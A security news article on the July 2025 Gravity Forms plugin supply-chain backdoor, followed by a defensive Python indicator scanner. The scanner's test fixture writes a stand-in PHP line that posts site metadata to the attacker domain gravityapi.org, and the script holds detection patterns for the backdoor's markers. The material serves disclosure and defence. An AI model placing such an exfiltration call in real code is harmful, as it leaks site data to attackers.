WordPress Plugin Developer for Gravity Forms Hacked, Backdoor Installed

📟 News

Date: 17/07/2025

The popular WordPress plugin Gravity Forms was hit by a supply chain attack: plugin packages downloaded from the vendor's official website had been modified to carry a backdoor.

Gravity Forms is a premium plugin for building contact, payment and other online forms. According to the vendor's own figures, it is installed on roughly one million sites, including those of well-known organizations such as Airbnb, Nike, ESPN, UNICEF and Google.

Researchers at Patchstack warn that they received reports of suspicious requests being generated by plugin copies downloaded from the official Gravity Forms website.

On examining the package, the researchers confirmed that the plugin downloaded from the vendor's website did contain a modified file, gravityforms/common.php. Closer inspection showed that this file sends a POST request to a suspicious domain, gravityapi[.]org/sites.

Further analysis showed that the modified plugin gathers extensive metadata about the site, including its URL, the path to the admin panel, and details of the installed themes and plugins and the PHP and WordPress versions. All of this data is transmitted to the attackers' server.

The attackers' server responds with base64-encoded PHP code, which the plugin decodes and writes to wp-includes/bookmark-canonical.php. This backdoor poses as "WordPress Content Management Tools" and allows unauthenticated remote code execution through functions such as handle_posts(), handle_media() and handle_widgets().

Rocketgenius, the company that develops Gravity Forms, was notified of the issue, and a representative told the researchers that only plugin copies installed via manual download or through Composer had been affected.

The researchers recommend that anyone who downloaded Gravity Forms on July 10-11, 2025, reinstall the plugin from a clean copy. Administrators should also check their sites for signs of infection.

Rocketgenius has since published an incident analysis confirming that only Gravity Forms versions 2.9.11.1 and 2.9.12, offered for manual download between July 10 and July 11, 2025, were compromised. Users who installed version 2.9.11 via Composer on those dates also received an infected copy of the plugin.

“The Gravity API service, which handles licensing, automatic updates, and the installation of add-ons initiated by Gravity Forms, has not been compromised. The attack did not affect the package updates managed by this service,” the developers stated.

According to the developer, the malicious code blocked update attempts, contacted an external server to fetch additional payloads, and created an administrator account on the site, giving the attackers full control of the compromised installation.
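The indicators reported above (the modified gravityforms/common.php calling out to gravityapi[.]org, the dropped wp-includes/bookmark-canonical.php, its handle_*() functions and "WordPress Content Management Tools" disguise, and the affected version numbers) are enough for a first file-system triage. The script below is an added example, not Patchstack's or Rocketgenius's tooling. It assumes a standard WordPress layout (wp-includes/, wp-content/plugins/gravityforms/) and, for offline testing, constructs its own throw-away sample tree with stand-in PHP that merely contains the strings the scanner looks for; it is not the real malware.

```python
#!/usr/bin/env python3
"""Scan a WordPress install for the Gravity Forms supply-chain indicators the
article names. Added example; not Patchstack's or Rocketgenius's tooling.

Hard indicators (file system): wp-includes/bookmark-canonical.php present, the
gravityapi.org callback domain inside the gravityforms plugin tree, and the
backdoor's handler names or its "WordPress Content Management Tools" string
under wp-includes. The plugin version is a weak signal only: 2.9.11.1, 2.9.12
(and 2.9.11 via Composer) were the affected builds, but the same version
numbers shipped clean through the Gravity API update channel.
"""
from __future__ import annotations

import re
import sys
import tempfile
from pathlib import Path

BACKDOOR_PATH = Path("wp-includes") / "bookmark-canonical.php"
PLUGIN_DIR = Path("wp-content") / "plugins" / "gravityforms"
# The article defangs the domain as gravityapi[.]org; the scanner needs the real
# spelling. The dot is escaped so only the literal domain matches.
C2_DOMAIN_RE = re.compile(rb"gravityapi\.org")
BACKDOOR_MARKER_RE = re.compile(
    rb"handle_(?:posts|media|widgets)\s*\(|WordPress Content Management Tools"
)
SUSPECT_VERSIONS = {"2.9.11", "2.9.11.1", "2.9.12"}
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*([0-9][0-9.]*)", re.MULTILINE)


def plugin_version(root: Path) -> str | None:
    """Version: line from the plugin's main file header, or None if absent."""
    header = root / PLUGIN_DIR / "gravityforms.php"
    if not header.is_file():
        return None
    match = VERSION_RE.search(header.read_text(errors="replace"))
    return match.group(1) if match else None


def _grep_php(root: Path, base: Path, pattern: re.Pattern[bytes]) -> list[str]:
    """Root-relative paths of .php files under base whose bytes match pattern."""
    if not base.is_dir():
        return []
    return sorted(p.relative_to(root).as_posix() for p in base.rglob("*.php")
                  if p.is_file() and pattern.search(p.read_bytes()))


def scan_wordpress_root(root: str | Path) -> dict[str, list[str]]:
    """Return every indicator hit, keyed by indicator name."""
    root = Path(root)
    findings: dict[str, list[str]] = {
        "dropped_backdoor": [],
        "c2_domain_in_plugin": _grep_php(root, root / PLUGIN_DIR, C2_DOMAIN_RE),
        "backdoor_markers_in_core": _grep_php(root, root / "wp-includes", BACKDOOR_MARKER_RE),
        "suspect_version": [],
    }
    if (root / BACKDOOR_PATH).is_file():
        findings["dropped_backdoor"].append(BACKDOOR_PATH.as_posix())
    version = plugin_version(root)
    if version in SUSPECT_VERSIONS:
        findings["suspect_version"].append(version)
    return findings


def is_infected(findings: dict[str, list[str]]) -> bool:
    """Any hard indicator means infected; a suspect version alone does not."""
    hard = ("dropped_backdoor", "c2_domain_in_plugin", "backdoor_markers_in_core")
    return any(findings[k] for k in hard)


def build_sample_site(dest: Path, infected: bool) -> Path:
    """Write a constructed, minimal WordPress tree for offline testing. The PHP
    is a stand-in written for this example, not the real malware; it only
    reproduces the strings the scanner looks for."""
    plugin = dest / PLUGIN_DIR
    plugin.mkdir(parents=True)
    (dest / "wp-includes").mkdir()
    (plugin / "gravityforms.php").write_text(
        "<?php\n/*\nPlugin Name: Gravity Forms\nVersion: 2.9.12\n*/\n")
    common = "<?php\nfunction gf_sample() { return true; }\n"
    if infected:
        common += "wp_remote_post('https://gravityapi.org/sites', array('body' => $meta));\n"
        (dest / BACKDOOR_PATH).write_text(
            "<?php\n// WordPress Content Management Tools\nfunction handle_posts() {}\n")
    (plugin / "common.php").write_text(common)
    return dest


def self_check() -> tuple[dict[str, list[str]], dict[str, list[str]]]:
    """Scan one infected and one clean constructed tree; returns (bad, good)."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = scan_wordpress_root(build_sample_site(Path(tmp) / "infected", True))
        good = scan_wordpress_root(build_sample_site(Path(tmp) / "clean", False))
    return bad, good


if __name__ == "__main__":  # usage: python gf_ioc_scan.py /var/www/html
    # With no argument, scan the constructed infected sample to show the output.
    result = scan_wordpress_root(sys.argv[1]) if len(sys.argv) > 1 else self_check()[0]
    for name, hits in result.items():
        print(f"{name}: {hits or '-'}")
    sys.exit(1 if is_infected(result) else 0)
```

Run it against the WordPress document root; any hard indicator gives exit status 1. A suspect version number on its own is only a prompt to look closer, since the same versions were served clean through the automatic-update channel. The script covers file-system indicators only: the administrator account the developer describes lives in the database, so wp_users should be reviewed separately for accounts nobody on the team created, and a common.php that matched should be diffed against a freshly downloaded clean copy before the site is declared clean.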
